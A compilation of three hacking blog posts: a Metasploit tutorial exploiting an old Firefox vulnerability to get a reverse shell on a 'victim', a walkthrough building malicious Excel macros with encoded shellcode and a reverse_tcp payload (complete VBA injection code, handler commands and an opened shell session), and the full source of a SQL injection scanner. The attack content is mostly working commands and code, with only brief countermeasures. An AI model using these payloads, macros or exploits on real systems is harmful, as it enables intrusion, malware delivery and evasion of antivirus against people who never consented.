  19. Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it's normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com. Requirements : 1. Metasploit Framework 2. Linux OS or Backtrack 5(Metasploit already included inside this distro) I. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate. msf > use exploit/windows/browser/mozilla_nstreerange msf exploit(mozilla_nstreerange) > show options Module options (exploit/windows/browser/mozilla_nstreerange): Name Current Setting Required Description ---- --------------- -------- ----------- CreateThread true yes Whether to execute the payload in a new thread SEHProlog true yes Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Auto (Direct attack against Windows XP, otherwise through Java, if enabled) II. There's a few option you should set up first before launching this exploit. SRVHOST : Your IP address acts as exploit server SRVPORT : port use to serve request from victim. 
The default value is 8080, but if port 80 is free it is better to use port 80, so the URL does not carry an unusual port. URIPATH: the path part of the URL, as in http://localhost/URIPATH; you can change this value to make the URL more human-readable, e.g. http://localhost/ANTIVIRUS. In the picture above I'm also using the meterpreter reverse_tcp payload, but you can choose whichever payload suits you. III. Once everything is set up correctly, run exploit to start our malicious web server. IV. After the victim opens the malicious URL we sent them, our server processes the request and the exploit creates a new notepad.exe process on the victim's computer. Below is the screenshot. V. A new session with ID 1 has been created; the next step is to interact with that session on the victim's computer. That's it — we're already inside the victim's computer. Countermeasures: - Always update Mozilla Firefox to the latest version. - Use a personal firewall to monitor inbound and outbound traffic; note that the reverse_tcp payload used here makes an outbound connection from the victim back to the attacker's SRVHOST, so it is egress filtering and outbound-connection alerting, not inbound blocking, that catches this stage. Hope it's useful. Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick
  20. First, let's create our shellcode using metasploit's msfpayload: For windows/exec payload: root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \ -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 254 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 281 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 308 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 335 (iteration=5) For reverse_tcp payload: root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \ -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5) For your own executable file: root@coresec:~# msfencode -i backdoor.exe -e x86/shikata_ga_nai -c 10 \ -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R [*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5) Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens: root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip --2011-04-23 14:30:31-- http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip Resolving www.didierstevens.com... 173.201.107.126 Connecting to www.didierstevens.com|173.201.107.126|:80... connected. 
HTTP request sent, awaiting response... 200 OK Length: 1378 (1.3K) [application/x-zip-compressed] Saving to: `shellcode2vbscript_v0_1.zip' 100%[===========================================================>] 1,378 --.-K/s in 0s 2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378] (The tool is fetched over plain HTTP with no checksum or signature check; verify what you downloaded before running it.) root@coresec:~# mkdir shellcode2vbscript root@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscript Archive: shellcode2vbscript_v0_1.zip inflating: shellcode2vbscript/shellcode2vbscript.py root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbs root@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbs (Note the path mismatch in the transcript: the archive was unzipped into shellcode2vbscript/, but the script is invoked from shellcode2vbscript_v0_1/; use whichever directory you actually extracted to.) root@coresec:~# ls -al CALC.vbs RVR.vbs -rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs -rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbs Now our generated code is ready. Despite the .vbs extension this is VBA, not standalone VBScript — the typed `Private Declare Function ... Lib "KERNEL32"` declarations are VBA syntax — and it is meant to be pasted into an Office macro (the .xlsm files below), not run with wscript. Also note that the addresses and handles are declared `As Long` (32-bit), so this exact code targets 32-bit Office only. Let's look at the code of CALC.vbs: Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long Const MEM_COMMIT = &H1000 Const PAGE_EXECUTE_READWRITE = &H40 Private Sub ExecuteShellCode() Dim lpMemory As Long Dim sShellCode As String Dim lResult As Long sShellCode = ShellCode() lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&) lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&) End Sub Private Function ParseBytes(strBytes) As String Dim aNumbers Dim sShellCode As String Dim iIter sShellCode = 
"" aNumbers = split(strBytes) for iIter = lbound(aNumbers) to ubound(aNumbers) sShellCode = sShellCode + Chr(aNumbers(iIter)) next ParseBytes = sShellCode End Function Private Function ShellCode1() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3") sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184") sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188") sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25") sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245") sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53") sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143") sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185") sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91") sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86") sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192") sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205") sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32") sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186") sShellCode = 
sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249") ShellCode1 = sShellCode End Function Private Function ShellCode() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ShellCode1() ShellCode = sShellCode End Function Then, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm): Finally let's execute our Macros: root@coresec:~# msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.7.0-dev [core:3.7 api:1.0] + -- --=[ 680 exploits - 354 auxiliary + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12397 updated yesterday (2011.04.21) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(handler) > set lhost 192.168.200.20 lhost => 192.168.200.20 msf exploit(handler) > set lport 4444 lport => 4444 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.200.20:4444 [*] Starting the payload handler... [*] Sending stage (240 bytes) to 192.168.200.2 [*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\coresec\Documents> NoVirusThanks results: Download: shellcode2vbscript_v0_1 RVR.xlsm CALC.xlsm Create Malicious Excel files using Metasploit and Shellcode2vbscript « AfterShell.com – IT Security Blog
  21. Below you can find the Source Code of the Damn Small SQLi Scanner (DSSS) v. 0.1b having less than 100 LOC (Lines of Code): #!/usr/bin/env python import difflib, httplib, optparse, random, re, sys, urllib2, urlparse NAME = "Damn Small SQLi Scanner (DSSS) < 100 LOC (Lines of Code)" VERSION = "0.1b" AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)" LICENSE = "GPLv2 (www.gnu.org/licenses/gpl-2.0.html)" NOTE = "This is a fully working PoC proving that commercial (SQLi) scanners can be beaten under 100 lines of code (6 hours of work, boolean, error, level 1 crawl)" INVALID_SQL_CHAR_POOL = ['(',')','\'','"'] CRAWL_EXCLUDE_EXTENSIONS = ("gif","jpg","jar","tif","bmp","war","ear","mpg","wmv","mpeg","scm","iso","dmp","dll","cab","so","avi","bin","exe","iso","tar","png","pdf","ps","mp3","zip","rar","gz") SUFFIXES = ["", "-- ", "#"] PREFIXES = [" ", ") ", "' ", "') "] BOOLEANS = ["AND %d=%d", "OR NOT (%d=%d)"] DBMS_ERRORS = {} DBMS_ERRORS["MySQL"] = [r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."] DBMS_ERRORS["PostgreSQL"] = [r"PostgreSQL.*ERROr", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."] DBMS_ERRORS["Microsoft SQL Server"] = [r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"Exception Details:.*\WSystem\.Data\.SqlClient\.", r"Exception Details:.*\WRoadhouse\.Cms\."] DBMS_ERRORS["Microsoft Access"] = [r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"] DBMS_ERRORS["Oracle"] = [r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"] DBMS_ERRORS["IBM DB2"] = [r"CLI Driver.*DB2", r"DB2 SQL error", r"db2_connect\(", r"db2_exec\(", r"db2_execute\(", r"db2_fetch_"] DBMS_ERRORS["Informix"] = [r"Exception.*Informix"] DBMS_ERRORS["Firebird"] = [r"Dynamic SQL Error", r"Warning.*ibase_.*"] DBMS_ERRORS["SQLite"] = 
[r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::"] DBMS_ERRORS["SAP MaxDB"] = [r"SQL error.*POS([0-9]+).*", r"Warning.*maxdb.*"] DBMS_ERRORS["Sybase"] = [r"Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"] DBMS_ERRORS["Ingres"] = [r"Warning.*ingres_", r"Ingres SQLSTATE", r"Ingres\W.*Driver"] def getTextOnly(page): retVal = re.sub(r"(?s)|<!--.+?-->||<[^>]+>|\s", " ", page) retVal = re.sub(r"\s{2,}", " ", retVal) return retVal def retrieveContent(url): retVal = ["", httplib.OK, "", ""] # [filtered/textual page content, HTTP code, page title, full page content] try: retVal[3] = urllib2.urlopen(url.replace(" ", "%20")).read() except Exception, e: if hasattr(e, 'read'): retVal[3] = e.read() elif hasattr(e, 'msg'): retVal[3] = e.msg retVal[1] = e.code if hasattr(e, 'code') else None match = re.search(r"(?P<title>[^<]+)", retVal[3]) retVal[2] = match.group("title") if match else "" retVal[0] = getTextOnly(retVal[3]) return retVal def shallowCrawl(url): retVal = set([url]) page = retrieveContent(url)[3] for match in re.finditer(r"href\s*=\s*\"(?P[^\"]+)\"", page, re.I): link = urlparse.urljoin(url, match.group("href")) if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])): retVal.add(link) return retVal def scanPage(url): for link in shallowCrawl(url): print "* scanning: %s" % link for match in re.finditer(r"(?:[?&;])((?P\w+)=[^&;]+)", link): vulnerable = False tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL)))) content = retrieveContent(tampered) for dbms in DBMS_ERRORS: for regex in DBMS_ERRORS[dbms]: if not vulnerable and re.search(regex, content[0], re.I): print " (o) parameter '%s' could be SQLi vulnerable! 
(%s error message)" % (match.group('parameter'), dbms) vulnerable = True if not vulnerable: original = retrieveContent(link) a, b = random.randint(100, 255), random.randint(100, 255) for prefix in PREFIXES: for boolean in BOOLEANS: for suffix in SUFFIXES: if not vulnerable: template = "%s%s%s" % (prefix, boolean, suffix) payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, ))) contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])] if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original) == len(contents[0][0]) != len(contents[1][0]): vulnerable = True else: ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]]) vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95 if vulnerable: print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0]) if __name__ == "__main__": print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) parser = optparse.OptionParser(version=VERSION) parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.htm?id=1\")") options, _ = parser.parse_args() if options.url: scanPage(options.url) else: parser.print_help() http://www.aftershell.com/2011/07/16/python-damn-small-sqli-scanner-dsss-v0-1b/